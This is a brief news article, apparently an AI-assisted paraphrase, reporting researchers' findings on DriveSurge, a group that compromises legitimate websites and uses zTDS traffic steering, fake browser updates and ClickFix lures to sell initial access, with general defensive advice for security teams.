Skip to content

DriveSurge Compromises Legitimate Websites for Initial Access Attacks

Bottom line: DriveSurge compromises thousands of legitimate websites to silently infect visitors with FakeUpdates or ClickFix manipulations via zTDS traffic steering and sells system access to other cybercriminals.

The threat group DriveSurge compromises thousands of reputable websites to redirect visitors to malware infrastructure and sell initial access to other cybercriminals. Security firm SilentPush documents attacks using zTDS, fake browser updates, and ClickFix manipulations since at least September 2025.

DriveSurge operates as an Initial Access Broker: the group compromises legitimate websites with high reputation and redirects visitors silently to a malicious distribution infrastructure. Initial access is then sold on a pay-per-install model to other cybercriminals who conduct ransomware, espionage, or data theft attacks.

The core component is the Traffic Distribution System zTDS, an open-source application for traffic steering known since at least 2015. After visiting a compromised website, zTDS redirects the visitor in the background and profiles them in real time: operating system, browser type, and geographic location are captured to select the most effective infection strategy.

DriveSurge employs two attack scenarios. FakeUpdates displays fake update notifications for Chrome, Firefox, Edge, Safari, Opera, Brave, Yandex, Vivaldi, Samsung Internet, and UC Browser and downloads malicious ZIP archives (for example, “Browser Update.exe” with Dynamic Link Libraries). ClickFix is a social engineering tactic that suggests the user has a loading error problem and prompts manual entry of a command line in Windows Command Prompt or PowerShell. Security analysts at SilentPush also identified variants targeting macOS with obfuscated JavaScript that hijacks the clipboard and injects malicious terminal commands.

The researchers isolated eight specific technical fingerprints to identify the DriveSurge infrastructure and compromised websites. For CISOs, this means: Cross-referencing suspicious infrastructure characteristics against these signatures can scan user traffic for active campaigns and detect early when internal systems make contact with zTDS systems.


Source: www.it-daily.net · Published June 7, 2026
Lumi AI News — AI-assisted curation in accordance with Article 50 EU AI Act. Paraphrase and classification via Lumi News Pipeline v1.6.5.

Share on: